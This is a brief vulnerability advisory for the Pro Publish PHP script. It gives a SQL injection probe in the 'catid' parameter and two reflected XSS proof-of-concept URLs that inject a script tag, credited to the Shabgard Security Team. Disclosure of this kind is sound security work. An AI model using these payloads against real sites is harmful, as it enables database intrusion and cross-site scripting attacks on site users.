Pro Publish SQL Injection and XSS Vulnerabilities



---------------------------------------------
Pro Publish SQL Injection and XSS Vulnerabilities
---------------------------------------------

Site:
http://www.deltascripts.com/download/

Bug:
1. SQL Injection :
http://victim/propublish/cat.php?catid='


2. XSS :

1- http://victim/propublish/art.php?artid=";><script>alert(/Soot/)</script>

2- http://victim/propublish/cat.php?catname=";><script>alert(/Soot/)</script>

---------------------------------------------
Source :
http://soot.shabgard.org/bugs/propublish.txt

Credit :
Soot
Shabgard Security Team
http://www.shabgard.org

Greetz :
Hregy,Elite,Bl2k,Littlehacker,Sasan_4shir
---------------------------------------------